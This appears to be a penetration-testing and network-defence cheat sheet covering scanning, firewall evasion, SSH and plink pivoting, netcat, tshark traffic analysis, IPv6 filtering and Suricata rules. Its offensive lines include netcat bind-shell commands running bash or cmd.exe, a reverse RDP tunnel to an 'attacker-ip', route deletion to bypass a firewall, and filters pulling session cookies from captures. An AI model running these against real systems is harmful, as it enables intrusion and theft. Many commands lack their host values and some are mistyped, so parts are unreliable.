Skip to content


Quick Reference

Cheat Sheets

Quick Reference

  • How to Find Your Public IP Address on Linux Command Line: curl
  • MAC to IPv6:
    • take the mac address: for example 52:74:f2:b1:a8:7f
    • throw ff:fe in the middle: 52:74:f2:ff:fe:b1:a8:7f
    • reformat to IPv6 notation 5274:f2ff:feb1:a87f
    • convert the first octet from hexadecimal to binary: 52 -> 01010010
    • invert the bit at index 6 (counting from 0): 01010010 -> 01010000
    • convert octet back to hexadecimal: 01010000 -> 50
    • replace first octet with newly calculated one: 5074:f2ff:feb1:a87f
    • prepend the link-local prefix: fe80::5074:f2ff:feb1:a87f
      format_eui_64() {
          local macaddr="$1"
          printf "%02x%s" $(( 16#${macaddr:0:2} ^ 2#00000010 )) "${macaddr:2}" \
              | sed -E -e 's/([0-9a-zA-Z]{2})*/0x\0|/g' \
              | tr -d ':\n' \
              | xargs -d '|' \
              printf "%02x%02x:%02xff:fe%02x:%02x%02x"
  • HTTP Request with /dev/tcp
    exec 3<>/dev/tcp/(INTERNAL IP ADDRESS)/80
    echo -e "GET / HTTP/1.1\r\nHost: (INTERNAL IP ADDRESS)\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (X11;Linux x86_64...) Gecko/20100101 Firefox/60.0\r\n\r\n" >&3
    cat <&3
  • TCP Flag Key:
  • Network Discovery
    nmap -sn <target addresses> # disable port scanning (keep discovery enabled)
    nmap -sP
    ettercap -T -i eth0 ///
    netdiscover -i ens33
  • IPv6
    arp -a
  • Virtual firewall bypass
    • route check routing table and look for the firewall node (gateways)
    • ip addr add dev ens3 add a new network interface
    • route delete -net gw netmask remove rule that's doing traffic forwarding to firewall
    • time for i in $(seq 1 254); do (ping -c 1 192.168.5.${i} | grep "bytes from" &); done host scan
    • iptables -L to get an idea about any blocking rules
  • Simple Protocol for Independent Computing Environments (SPICE)

Network Security Monitoring

  • Prevention eventually fails. One version of this philosophy is that security breaches are inevitable
  • Prevention mechanisms can block some malicious activity, but it’s increasingly difficult for organizations to defend themselves as adversaries adopt more sophisticated tactics.
  • NSM is threat-centric, meaning adversaries are the focus of the NSM operation. Continuous Monitoring (CM) is vulnerability-centric, focusing on configuration and software weaknesses.
  • NMS is a strategy backed by tactics that focus on visibility, not control.
  • Placed outside of NAT/NPAT, so that the NSM sees actual source IP of traffic
    • configure switch to send copies of the traffic they see to an otherwise unused switch port. Cisco calls this technique the Switched Port Analyzer. Juniper and Dell use the term port mirroring.
      • intruders could disable a SPAN port in order to hide some of their activities
    • or use network taps that provide separate ports with copies of network traffic. (Net Optics iTap Port Aggregator)
  • Network address translation (NAT)
  • Network port address translation (NPAT or PAT).
    • Each translation device rewrites the wireless or internal source IP address to be a single IP value, and uses changing source ports to differentiate among sending computers.
    • As with NAT, each translation device maintains a table to track any changes.
    • Computers use the combination of source IP address, source port, destination IP address, destination port, and IP protocol to identify unique connections.
    • Ports are the key in the translation process, as they permit several private IP addresses to be hidden behind a single public IP address.
  • Recommendations
    • Limit command shell access to the system to only those administrators who truly need it. Analysts should log in to the sensor directly only in an emergency. Instead, they should access it through tools that allow them to issue commands or retrieve data from the sensor.
    • Administrators should never share the root account, and should never log in to sensors as the root account. If possible, access the sensor using shared keys, or use a two-factor or two-step authentication system like Google Authenticator.
    • Always administer the sensor over a secure communications channel like OpenSSH.
    • Do not centrally administer the sensor’s accounts using the same system that manages normal IT or user assets.
    • Always equip production sensors with remote-access cards.
    • Assume the sensor is responsible for defending itself. Limit the expo- sure of services on the sensor, and keep all services up-to-date.
    • Export logs from the sensor to another platform so that its status can be remotely monitored and assessed.
    • If possible, put the sensor’s management interface on a private network reserved for management only.
    • If possible, use full disk encryption to protect data on the sensor when it is shut down.
    • Create and implement a plan to keep the sensor software up-to-date. Treat the system like an appliance, but maintain it as a defensible platform.
  • Tools
  • Security Onion (SO) NSM suite
    • Linux distro for IDS and NSM
      • Snort
      • Suricata
      • Sguil
      • Squert: View NIDS/HIDS alerts and HTTP logs
      • Snorby: View and annotate IDS logs
      • ELSA: Seach logs (IDS, Bro, syslog)
      • Xplico: Carve PCAP files
    • sudo service nsm status
    • curl
    • Create separate user for each sensor (SSH)

Port Scanning

  • FPing: for ip in $(seq 1 254);do fping 10.11.1.$ip >> fping.txt;done;grep alive ./fping.txt
  • Nc:
    • for ip in $(seq 1 5); do nc -nvv -z 192.168.1.$ip 80 &>> /tmp/ncscan.txt done
    • nc -z -v (TARGET IP ADDRESS) 1-1024 2>/dev/stdout| grep -v refused
  • ARP ping: nmap -sP -PR -oG nmap-arp.txt
  • Ping: for ip in $(seq 1 254);do ping -c 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 & done
  • /dev/tcp: for port in $(seq 1 65530); do (echo $port > /dev/tcp/$target/$port && printf "[!] $port is open.\n") 2>/dev/null done
  • Port monitor
    watch -n1 nc -w1 -nvz 123
    # -w1: timeout 1 sec, -n: no reverse lookup, -v: verbose, -z: no IO, act as a scanner
  • Nmap: Evade Firewall
    • -sA - TCP ACK Scan
      • Because of the ACK packets the firewall cannot create the log
      • Firewalls treat ACK packet as the response of the SYN packet - Open port (few ports in the case of the firewall)
        • Closed port (most ports are closed because of the firewall)
        • Filtered (Nmap is not sure whether the port is open or not)
        • Unfiltered (Nmap can access the port but is still confused about the open status of the port)
    • -sW - TCP Window Scan
      • Designed to differentiate between open and closed ports instead of showing unfiltered
      • Does not open any active session with the target computer
      • Send ACK packets and receive a single RST packet in response
    • -f, -ff - Fragment Packets
    • -spoof-mac Cisco - Spoof MAC
    • -scan_delay - control the delay between each and every request
    • -host-timeout
  • Types of port scans
    • TCP Connect Scan: nc -nvv -w 1 -z <ip> <port-range>
      • Full 3 way handshake
    • SYN / Stealth Scan
      • Send SYN
      • SYN-ACK means open
      • RST means closed
    • UDP Scanning: nc -nv -u -z -w 1 <ip> <port-range>
      • ICMP port unreachable means closed
      • No response means open
  • Port Knocking: for x in 1111, 2222, 3333; do nmap -Pn --host_timeout 201 --scan-delay 0.2 --max-retries 0 -p $x <IP>; done
    • Look for: knockd
    • Configured at: ​/etc/knockd.conf​
  • Scanning Methods
    • All TCP and UDP fast scan:
      masscan -p1-65535,U:1-65535 <IP> --rate=1000 -e tun0 -p1-65535,U:1-65535 > ports
      ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
      nmap -Pn -sV -sC -sU -sT -p$ports <IP>
    • Quick all TCP scan using Nmap only:
      ports=(nmap -p- --min-rate=1000 -T4 <IP> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
      nmap -Pn -sV -sC -sU -sT -p$ports <IP>
    • Quick all TCP and UDP scan using Nmap only:
      ports=(nmap -p- --min-rate=1000 -T4 <IP> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
      nmap -Pn -sV -sC -sU -sT -p$ports <IP>
      nmap -sS -T5 -A -f -v IP
      nmap -n -Pn -sV --version-all --open -sC -oA [target] --stats-every 120
      nmap -T4 -sV -sC -Pn [box ip] -oA [box_name]_initial_scan
  • Vulnerability Scanning
    • Nmap
      nmap -v -p 80 --script http-vuln-cve2010-2861 <ip>
      nmap -v -p 80 --script all <ip>
      nmap -v -p 80 -sC <ip>
      nmap -v -p 80 --script default,safe <ip>
    • OpenVAS

Port Forwarding / Tunneling

Local:   ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote:  ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: ssh <gateway> -D <port to bind>

Local:   plink.exe <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote:  plink.exe <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic: plink.exe <gateway> -D <port to bind>

Local Port Forwarding

ssh -L <local-port-to-listen>:<remote-host>:<remote-port> <gateway>

Allow connections to a specific blocked server. From work login to home and use it as a gateway to access

ssh -L user@home #work
curl http://localhost:9001 #home

ssh -L 9001:banned:22 user@home
ssh -p 9001 localhost

Allow remote connections to local port forwards (listening on all interfaces)

ssh -L 9001:banned:22 user@home -g
ssh -p 9001 work_machine #remotely

Access a port on your server which can only be accessed from localhost and not remotely. Server acts as the gateway and binds server's port 5432 to local port 9000.

ssh -L 9000:localhost:5432 user@server
psql -h localhost -p 9000

Remote Port Forwarding

Allow remote access to restricted network.

Server will bind port 9001 on home machine to listen for incoming requests which would subsequently be routed through the created SSH channel. Connecting to localhost:9001 in home will forward user to intra:22

ssh -R 9001:intra-ssh-server:22 user@home #work
ssh -p 9001 localhost #home

Add GatewayPorts yes to sshd_config to listening on all interfaces.

Allow public access to a local resource through a public server.

ssh -R 9000:localhost:3000 user@public_sever
sudo vim /etc/ssh/sshd_config
GatewayPorts yes
sudo service ssh restart

Dynamic port forwarding

One local port for tunneling data to all remote destinations (SOCKS protocol)

ssh -D 9001 home
ssh -fND 9001 home
echo 'socks5 9999' >> /etc/proxychains.conf
curl && proxychains curl

Quick Reference

  • Monitoring Tunnels: netstat -tunelp
  • Avoid TTL: -nNT
  • Creating reverse SSH client to tunnel-out remote desktop port
    • FROM remote non-routable machine
      pling -l root -pw password attacker-ip -R 3390:  
      # localhost 3389 to attacker ip 3389
    • FROM attacker's machine
      rdesktop localhost:3390
  • SSH Dynamic Port Forwarding (compromised DMZ used to scan internal IPs)
    • Create local SOCS4 proxy: From attacker's machine (compromised DMZ)
      ssh -D 8080 root@DMZ-IP
      netstat -antp | grep 8080
      socks4 8080
      proxychains nmap -p 3389 -ST -Pn non-routable-remote-ip-range --oepn
      proxychains rdesktop rdp-ip-in-non-routable-range
  • Ncat:
    • Forward local 1234 to command
    • sudo /usr/bin/ncat -l 1234 --sh-exec "ncat 987 -p 53" Tools


New References


  • Inject code and spy on wifi users:
  • Collection of PowerShell network security scripts for system administrators:
  • CyberScan: Network's Forensics ToolKit
  • Sparta:
  • BetterCap - Swiss army knife for network attacks and monitoring:
  • Nmap
    • Port Related Information: /usr/share/nmap/nmap-servies
    • ICMP (Ping) Sweep:
      nmap -sn <pi-rage>
      nmap -sn <ip-range> -oG filename (grepable format)
    • Sweep TCP/UDP ports: nmap -p 80 <ip-range> -oG filename
    • Sweep full network for top ports: nmap -sT -A --top-ports=20 <ip-range> -G filename
    • Script engine: ls -l /usr/share/nmap/scripts | grep smb
    • Important flags
      • -O for OS Fingerprinting
      • -sV for banner grabbing
    • Netstat
      • Kernel IP routing table: netstat -nr
      • Listening ports: netstat -lp netstat -lvnp
    • Netcat
      • Cheat sheet:
      • General Commands
        • Listen on port 567/TCP: nc -l -p 567
        • Connecting to 567 of nc 5676
        • Pipe a text file to the listener: cat infile | nc 567 -q 10
        • Have the listener save a received text file: nc -l -p 567 > textfile
        • Transfer a directory:
          • Reciever: nc -l -p 678 | tar xvfpz
          • Sender: tar zcfp - /path/to/directory | nc -w 3 678
        • Send a message to your syslog server (the <0> means emerg): echo '<0>message' | nc -w 1 -u syslogger 514
        • Setup a remote shell listener:
          • nc -v -e '/bin/bash' -l -p 1234 -t
          • nc l p 1234 e "c:\windows\system32\cmd.exe"
        • Make an HTTP request: echo -e "GET HTTP/1.0nn" | nc -w 5 80
        • One-page webserver: cat homepage.txt | nc -v -l -p 80
      • General Options
        • Use IPv4 addressing only: nc -4 [options] [host] [port]
        • Use IPv6 addressing only: nc -6 [options] [host] [port]
        • UDP instead of TCP: nc -u [options] [host] [port]
        • Listen for an incoming connection: nc -l [host] [port]
        • Continue listening after client has disconnected: nc -k -l [host] [port]
        • No DNS lookups: nc -n [host] [port]
        • Use specific source port: nc -p [source port] [host] [port]
        • Use source IP: nc -s [source ip] [host] [port]
        • Apply 'n' second timeout: nc -w [timeout] [host] [port]
        • Verbose output: nc -v [host] [port]
      • Port Scanning
        • Scan a single TCP port: nc -zv 80
        • Scan a range of ports: nc -zv 80-84
        • Scan multiple ports: nc -zv 80 84
      • Other
        • One page web server: while : ; do ( echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html; ) | nc -l -p 8080 ; done
        • Proxy: mknod backpipe p ; nc -l [proxy port] < backpipe | nc [destination host] [destination port] > pipe
        • Wrap readline history library (support up arrow, etc):rlwrap nc -t remotehost 23
      • References:


Domain Fronting



Traffic Analysis

  • Accounting Traffic
    # Reset counters and iptables rules
    iptables -Z && iptables -F
    # Measure incoming traffic from lab machine
    iptables -I INPUT 1 -s -j ACCEPT
    # Measure outgoing traffic to lab machine
    iptables -I OUTPUT 1 -d -j ACCEPT
    watch -n 1 iptables -nvL
  • Using a Capture: aircrack-ng captured.cap​
  • Netcap - A framework for secure and scalable network traffic analysis:
  • PCAP Samples:
  • PA Toolkit (Pentester Academy Wireshark Toolkit) - PA Toolkit is a collection of traffic analysis plugins to extend the functionality of Wireshark from a micro-analysis tool and protocol dissector to the macro analyzer and threat hunter:
  • CapAnalysis:
  • Netsh (Windows)
    netsh trace show capturefilterhelp
    netsh trace show scenarios
    netsh trace show globalkeywordsandlevel
    netsh trace start capture=yes IPv4.Address=
    netsh trace start scenario=InternetClient,InternetServer,NetConnection globalLevel=win:Verbose capture=yes report=yes traceFile=C:\temp\trace\trace001.etl
    netsh trace stop
  • Use Microsoft Network Monitor 3.4 to view:
  • Convert to PAC from:
  • Use powershell to convert:
    $s = New-PefTraceSession -Path C:\output\path\spec\OutFile.Cap -SaveOnStop
    $s | Add-PefMessageProvider -Provider C:\input\path\spec\Input.etl
    $s | Start-PefTraceSession
  • tcpdump to show HTTP request/response headers
      sudo tcpdump -A -s 10240 'tcp port 4080 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | egrep --line-buffered "^........(GET |HTTP\/|POST |HEAD )|^[A-Za-z0-9-]+: " | sed -r 's/^........(GET |HTTP\/|POST |HEAD )/\n\1/g'
      sudo stdbuf -oL -eL /usr/sbin/tcpdump -A -s 10240 "tcp port 4080 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)" | egrep -a --line-buffered ".+(GET |HTTP\/|POST )|^[A-Za-z0-9-]+: " | perl -nle 'BEGIN{$|=1} { s/.*?(GET |HTTP\/[0-9.]* |POST )/\n$1/g; print }'
  • tcpdump
    tcpdump -i eth1  -s 0 port not 22
    tcpdump -i eth1  -s 0 port not 22 and port not 53
    tcpdump -i eth1 port not 22 and host


  • General
    • Supported network interfaces: tshark -D
    • Sniff on eth0: tshark -i eth0
    • Open pcap: tshark -r HTTP_traffic.pcap
    • Read 100 packets from pcap: tshark -r HTTP_traffic.pcap -c 100
    • Print full details for first 10 Packets: tshark -r HTTP_traffic.pcap -c 10 -V
    • List of protocols in pcap: tshark -r HTTP_traffic.pcap -z io,phs -q
    • Export into PDML: tshark -r HTTP_traffic.pcap -T pdml > http.xml
    • PDML to HTML: xsltproc /usr/share/wireshark/pdml2html.xsl http.xml > http.html
  • HTTP
    • Only the HTTP traffic: tshark -Y 'http' -r HTTP_traffic.pcap
    • IP packets sent from IP address to tshark -r HTTP_traffic.pcap -Y "ip.src== && ip.dst=="
    • Packets containing GET requests: tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"
    • Print only source IP and URL for all GET request packets: tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri
    • Packets contain the "password" string: tshark -r HTTP_traffic.pcap -Y "http contains password”
    • Destination IP for GET requests sent to New York Times ( tshark -r HTTP_traffic.pcap -Y "http.request.method==GET &&" -Tfields -e ip.dst
    • Session ID being used by for Amazon India store ( tshark -r HTTP_traffic.pcap -Y "ip contains && ip.src==" -Tfields -e ip.src -e http.cookie
    • Type of OS is using: tshark -r HTTP_traffic.pcap -Y "ip.src== && http" -Tfields -e http.user_agent
    • Only show SSL traffic?: tshark -r HTTPS_traffic.pcap -Y 'ssl'
    • Only print the source IP and destination IP for all SSL handshake packets: tshark -r HTTPS_traffic.pcap -Y "ssl.handshake" -Tfields -e ip.src -e ip.dst
    • List issuer name for all SSL certificates exchanged: tshark -r HTTPS_traffic.pcap -Y "ssl.handshake.certificate" -Tfields -e x509sat.printableString
    • Print the IP addresses of all servers accessed over SSL: tshark -r HTTPS_traffic.pcap -Y "ssl && ssl.handshake.type==1" -Tfields -e ip.dst
    • IP addresses associated with Ask Ubuntu servers ( tshark -r HTTPS_traffic.pcap -Y "ip contains askubuntu"
    • The IP address of the user who interacted with with Ask Ubuntu servers ( tshark -r HTTPS_traffic.pcap -Y "ip.dst== || ip.dst== || ip.dst== || ip.dst==" -Tfields -e ip.src
    • What DNS servers were used: tshark -r HTTPS_traffic.pcap -Y "dns && dns.flags.response==0" -Tfields -e ip.dst
    • Name of the antivirus solution: tshark -r HTTPS_traffic.pcap -Y "ip contains avast" -Tfields -e ip.src
  • WiFi
    • Show only WiFi traffic: tshark -r WiFi_traffic.pcap -Y "wlan"
    • View the deauthentication packets: tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"
    • Display WPA handshake packets: tshark -r WiFi_traffic.pcap -Y "eapol"
    • Print the SSID and BSSID values for all beacon frames: tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid
    • What is BSSID of SSID "LazyArtists": tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid
    • Channel of SSID "Home_Network": tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e
    • Devices that received deauth messages: tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra
    • Which device does MAC 5c:51:88:31:a0:3b belongs to: tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent
    • Beacon frames present: tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype == 0x0008'
    • Unique list of all AP BSSIDs: tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype == 0x0008' -T fields -e wlan.bssid | sort | uniq
    • Unique list of all AP SSIDs: tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype == 0x0008' -T fields -e wlan.ssid | sort | uniq
    • Only non-null SSIDs: tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype == 0x0008 && !(wlan.tag.length ==0)' -T fields -e wlan.ssid | sort | uniq
    • Unique list of SSID and BSSIDs side by side for all AP networks: tshark -r WiFi_traffic.pcap -Y 'wlan.fc.type_subtype == 0x0008' -T fields -e wlan.ssid -e wlan.bssid | sort | uniq
  • VoIP
    • Show VoIP traffic: tshark -r VoIP_traffic.pcap -Y "sip or rtp"
    • Print all REGISTER packets: tshark -r VoIP_traffic.pcap -Y "sip.Method==REGISTER"
    • Only print the source IP, sender extension and authorization digest response for REGISTER packets: tshark -r VoIP_traffic.pcap -Y "sip.Method==REGISTER" -Tfields -e ip.src -e sip.from.user -e sip.auth.digest.response
    • Print all codecs being used by RTP protocol: tshark -r VoIP_traffic.pcap -Y "sdp" -Tfields -e
    • User who is using the Zoiper VoIP client: tshark -r VoIP_traffic.pcap -Y "sip contains Zoiper" -Tfields -e ip.src
    • IP address of the SIP server used to place calls: tshark -r VoIP_traffic.pcap -Y "sip.Method==REGISTER" -Tfields -e ip.dst
    • Content of the text message sent to +918108591527?: tshark -r VoIP_traffic.pcap -Y "sip.Method == MESSAGE" -V (Read the content)
    • Extensions completed a call successfully: tshark -r VoIP_traffic.pcap -Y "sip.Method==BYE" -Tfields -e sip.from.user -e


  • Phishing Blacklist:
  • Open Source Security (OSSEC) is a free, open-source, host-based intrusion detection system (HIDS)
    • log analysis portion of OSSEC as a log-based intrusion detection system (LIDS)
    • OSSEC is a virtual appliance based on CentOS and includes Elastic search-Logstash-Kibana (ELK)
    • Atomic rules are based on a single event occurring, while a composite rule is based on patterns across multiple logs.
  • Hamachi by LogMeIn is a cloud-based, professional-level application that allows you to easily create a virtual private network (VPN)


  • Disallow traffic from unallocated IP address spaces
  • Implement Anti-Spoofing perimeter ACL:
    • No packet with a source address of your network allocation can ENTER your network.
    • No packet with a destination address of your network allocation can LEAVE your network.
  • Two categories of traffic
    • Traffic initiated from perimeter security device
    • Traffic that is in-transit across perimeter
  • Transit Traffic
    • Transit Traffic Category Recommendations
      • Start with a DENY ALL approach, and then allow selectively. Ensures that all unassigned/experimental types are DROPPED.
      • Allow Type 1: Destination Unreachable. Filter selectively allowing only specific codes such as code 4 - port unreachable.
      • Allow Type 2: Packet too large. (Do not break path MTU discovery)
      • Allow Type 3, Code 0 only. (TTL/Hop limit expired)
      • Allow Type 4, Codes 0 and 1 only related to header errors.
    • Transit traffic filtering continued…
      • Optionally allow ICMP types 128/129 (echo request/reply) based on local ICMP security policy.
      • Allow ICMP types 144 through 147 ONLY if your IPv6 network is “mobility enabled”. Many may choose to leave this in default drop state.
      • Optionally allow ICMP Multicast related messages (types 151 - 153).
        • ONLY applicable if you participate in global multicast sourcing.
    • ICMP type 137 (Redirect) represents a direct security threat and should always be dropped at the perimeter.
  • Non-transit
    • Traffic initiated from perimeter security devices
    • Again start with a DENY ALL policy
    • Use the same recommendations as transit above with the exception of the mobility enabled class
    • Additional messages to ALLOW should be:
      • Types 133/134: Router solicitation / advertisement
      • Types 135/136: Neighbor solicitation / advertisement
      • Types 141/142: Inverse neighbor solicitation / advertisement
  • Multicast Filtering
    • Likely assumption for most is to not participate in global/inter-domain multicast
      • Any packet with a multicast source address should be dropped
      • Reserved and unused multicast destinations should be dropped.
      • Probably most other multicast destinations will be blocked in a perimeter context.
        • You don’t want any site or organization local traffic crossing the perimeter
        • Realm-local scoped traffic will be confined to specific technologies.
        • The decision to drop realm-local will have to be policy based.
      • Global multicast should be dropped if not participating inter-domain.
  • Protocol Normalization
    • IPv6 has a protocol header field labeled “Next Header”.
    • Normal OSI Layer 4 headers are called an “Upper Layer Header”
    • There can be chained “Extension Headers” in the frame before UL Header.

IDS/IPS - Suricata

  • Installation:
    sudo add-apt-repository ppa:oisf/suricata-stable 
    sudo apt-get update
    sudo apt-get install suricata
  • Update: suricata-update
    • With cron: 0 0 * * * /usr/bin/suricata-update && kill -USR2 $(pidof suricata) > /dev/null 2>&1
      suricata-update update-sources
      suricata-update list-sources
      suricata-update enable-source <name>
      suricata-update add-source <name> <url>
      suricata-update remove-source <name>
      suricata-update list-enabled-sources
  • Reload: kill -USR2 $(pidof suricata)
  • Config: /etc/suricata/suricata.yaml
    • HOME_NET – Internal network which is to be protected
    • EXTERNAL_NET – External network;
    • af-packet interface – Network interface which Suricata should use for monitoring.
  • Logs: /var/log/suricata
    • eve.json: Network events and alerts in Extensible Event Format
    • suricata.log: Service messages
    • fast.log: Network events and alerts in single line formatted.
  • Rules: /var/lib/suricata/rules (OOTB rules are at /etc/suricata/rules)
    • Referenced from config file at rule-files section.
  • Rule Types:
    • Pass – let the packet through without generating an alert
    • Drop – if matched, drop and logd
    • Reject – similarly drop, and both the sender and receiver will receive a reject packet
    • Alert – the packet is allowed through but an alert will be generated
  • Supported porotocals:
  • Rule format:
    • "Source IP" "Source port" -> "Destination IP" "Destination port"
    • "Source IP" "Source port" <> "Destination IP" "Destination port"
    • Example: $EXTERNAL_NET any -> $HOME_NET 22
  • Options:
    • msg – information
    • sid – unique ID number of the rule
    • rev – version of the rule (incremented by 1 when the rule is updated)
    • (msg:"Suspicious connection @ 1111"; sid:1111; rev:1;)
  • Example Rule:
    alert tcp $EXTERNAL_NET any -> $HOME_NET 3306 (msg:"ET SCAN Suspicious inbound to mySQL port 3306"; flow:to_server; flags:S; threshold: type limit, count 5, seconds 60, track by_src; metadata: former_category POLICY; reference:url,; classtype:bad-unknown; sid:2010937; rev:3; metadata:created_at 2010_07_30, updated_at 2018_03_27;) 
    drop tcp any any -> any (msg: "TCP packet to malicious host, Drop"; sid:10001;)
    drop tcp any -> any any (msg: "TCP packet from malicious host, Drop"; sid:10002;)
    drop udp any any -> any (msg: "UDP packet to malicious host, Drop"; sid:10003;)
    drop udp any -> any any (msg: "UDP packet from malicious host, Drop"; sid:10004;)
  • NFQUEUE: iptables and ip6tables target which delegates the decision on packets to a userspace software.
    • When sudicata is installed in gateway:
      sudo iptables -I FORWARD -j NFQUEUE
    • When installed on the host that should be protected:
      sudo iptables -I INPUT -j NFQUEUE
      sudo iptables -I OUTPUT -j NFQUEUE
    • Example:
      iptables -t mangle -I PREROUTING -p tcp -m tcp --dport 80 -j NFQUEUE --queue-num 0
      iptables -t mangle -I PREROUTING -p tcp -m tcp --sport 80 -j NFQUEUE --queue-num 0
      iptables -t mangle -I PREROUTING -p udp -m udp --dport 53 -j NFQUEUE --queue-num 0
      iptables -t mangle -I PREROUTING -p udp -m udp --sport 53 -j NFQUEUE --queue-num 0
  • Modes:
    mode: accept/repeat/route
    repeat_mark: 1             # repeat mode option
    repeat_mask: 1             # repeat mode option
    route_queue: 2             # route mode option
    • accept: the packet will not be inspected by the rest of the iptables rules
    • repeat: the packets will be marked by Suricata and re-injected to the first rule of iptables. Looping is avoided by:
      • iptables -I FORWARD -m mark ! --mark $MARK/$MASK -j NFQUEUE
    • route: make sure the packet will be sent to another tool after being processed by Suricata
  • Reload rules: suricatasc -c reload-rules